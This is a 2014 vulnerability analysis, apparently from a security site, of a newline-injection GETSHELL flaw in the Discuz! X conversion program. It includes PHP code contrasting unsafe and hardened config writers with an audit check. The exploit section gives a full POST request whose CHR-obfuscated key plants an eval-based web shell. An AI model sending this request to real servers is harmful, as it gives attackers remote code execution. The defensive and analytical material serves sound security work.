Discuz! X upgrade/conversion program GETSHELL vulnerability analysis - vulnerability warning - the black bar safety net

2014-02-15T00:00:00
ID MYHACK58:62201442391
Type myhack58
Reporter Anonymous
Modified 2014-02-15T00:00:00

Description

0x01 vulnerability analysis


The root cause of the vulnerability is that a line break can be injected into a code comment of a generated PHP file, which results in code execution. The process is as follows:

0x0101 First, start from line 30 of index.php.


0x0102 At line 37 of do_config_inc.php, follow the call into the save_config_file() function.


0x0103 At line 624 of global.func.php, follow the call into the getvars() function.


0x0104 Continue into the buildarray() function.


0x0105 The vulnerability is at lines 58-59: the handling of $newline.


Because $key can be controlled by the requester, $newline can be controlled as well. When $newline contains \r or \n, the comment line is terminated early and the text that follows (BBB in the figure) is written into the config file as PHP code, where it is executed. As shown in the figure.
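As an added illustration (not Discuz!'s own code), the unsafe pattern the analysis describes, a hardened writer that rejects keys which are not plain identifiers, and a check that flags statements smuggled into an already generated config file; the function names and the sample keys are constructed for this example.

```php
<?php
// Added illustration, not Discuz!'s own code: a config writer that copies an
// untrusted array key into a "//" comment, next to a hardened version and an
// audit for generated files. Function names and sample input are constructed.

// Vulnerable pattern: $key is interpolated into a comment unchecked, so a key
// holding "\r\n" ends the comment and the rest of the key is parsed as PHP.
function build_config_unsafe(array $cfg, string $var = '$_config'): string {
    $out = "<?php\n";
    foreach ($cfg as $key => $val) {
        $newline = $var . "['" . $key . "']";
        $out .= "// " . $newline . "\n";            // line break in $key escapes the comment
        $out .= $newline . " = '" . addslashes($val) . "';\n";
    }
    return $out;
}

// Hardened pattern: accept identifier-like keys only and let var_export()
// emit a correctly quoted literal for the value.
function build_config_safe(array $cfg, string $var = '$_config'): string {
    $out = "<?php\n";
    foreach ($cfg as $key => $val) {
        if (!preg_match('/^[A-Za-z0-9_]{1,64}$/', (string)$key)) {
            throw new InvalidArgumentException('rejected config key: ' . json_encode($key));
        }
        $newline = $var . "['" . $key . "']";
        $out .= "// " . $newline . "\n" . $newline . ' = ' . var_export((string)$val, true) . ";\n";
    }
    return $out;
}

// Audit for files already written: report every line that is neither blank, the
// open tag, a comment, nor a plain assignment to the config array.
function audit_config(string $source, string $var = '$_config'): array {
    $ok = '/^' . preg_quote($var, '/') . "\\['[A-Za-z0-9_]+'\\] = .*;$/";
    $hits = [];
    foreach (preg_split('/\r\n|\r|\n/', $source) as $n => $line) {
        $t = trim($line);
        if ($t === '' || $t === '<?php' || substr($t, 0, 2) === '//') continue;
        if (!preg_match($ok, $t)) $hits[] = ($n + 1) . ': ' . $t;
    }
    return $hits;
}

// Constructed sample: one key smuggles a line break plus a PHP statement.
$hostile = ["aaa\r\n\r\necho 'BBB';//" => 'localhost', 'dbhost' => 'localhost'];
print_r(audit_config(build_config_unsafe($hostile)));  // flags the smuggled statement
try { build_config_safe($hostile); } catch (InvalidArgumentException $e) { echo $e->getMessage(), "\n"; }
```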


0x02 exploit


You can construct the following request:

POST /DZ2/convert/ HTTP/1.1
Host: 192.168.52.129
Proxy-Connection: keep-alive
Content-Length: 925
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Origin: null
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/29.0.1547.57 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip,deflate,sdch
Accept-Language: EN-us,EN;q=0.8

a=config&source=d7.2_x2.0&submit=yes&newconfig%5Btarget%5D%5Bdbhost%5D=localhost&newconfig%5Baaa%0D%0A%0D%0Aeval%28CHR%28101%29.CHR%28118%29.CHR%2897%29.CHR%28108%29.CHR%2840%29.CHR%2834%29.CHR%2836%29.CHR%2895%29.CHR%2880%29.CHR%2879%29.CHR%2883%29.CHR%2884%29.CHR%2891%29.CHR%2899%29.CHR%2893%29.CHR%2859%29.CHR%2834%29.CHR%2841%29.CHR%2859%29%29%3B%2F%2F%5D=localhost&newconfig%5Bsource%5D%5Bdbuser%5D=root&newconfig%5Bsource%5D%5Bdbpw%5D=&newconfig%5Bsource%5D%5Bdbname%5D=discuz&newconfig%5Bsource%5D%5Btablepre%5D=cdb_&newconfig%5Bsource%5D%5Bdbcharset%5D=&newconfig%5Bsource%5D%5Bpconnect%5D=1&newconfig%5Btarget%5D%5Bdbhost%5D=localhost&newconfig%5Btarget%5D%5Bdbuser%5D=root&newconfig%5Btarget%5D%5Bdbpw%5D=&newconfig%5Btarget%5D%5Bdbname%5D=discuzx&newconfig%5Btarget%5D%5Btablepre%5D=pre_&newconfig%5Btarget%5D%5Bdbcharset%5D=&newconfig%5Btarget%5D%5Bpconnect%5D=1&submit=%B1%A3%B4%E6%B7%FE%CE%F1%C6%F7%C9%E8%D6%C3
